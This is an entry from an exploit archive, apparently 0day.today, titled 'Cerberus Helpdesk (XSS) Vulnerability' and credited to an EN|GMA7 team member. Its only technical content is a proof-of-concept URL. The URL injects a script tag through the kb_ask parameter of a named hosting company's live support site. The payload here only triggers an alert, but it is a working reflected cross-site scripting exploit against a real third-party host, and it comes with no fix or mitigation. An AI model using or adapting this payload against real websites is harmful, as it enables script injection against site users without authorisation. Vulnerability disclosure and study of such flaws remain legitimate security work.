id: 11403
date: 03/23/2010
title: Cerberus Helpdesk (XSS) Vulnerability
author: Suliman
cves: 

=====================================
Cerberus Helpdesk (XSS) Vulnerability
=====================================

[~] Title     : Cerberus Helpdesk (XSS) Vulnerability
[~] Author    : Suliman  From => EN|GMA7 Team
[~] Tested on : windows and Linux
[~] Homepage  : www.enigma7.net<http://www.enigma7.net>
[~] Thanks to :( Zaid  - Mohammad  - Hussain )


[~] POC:

https://support.carohosting.com/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22EN|GMA7%22%29%3C%2Fscript%3E




#  0day.today [2023-03-24]  #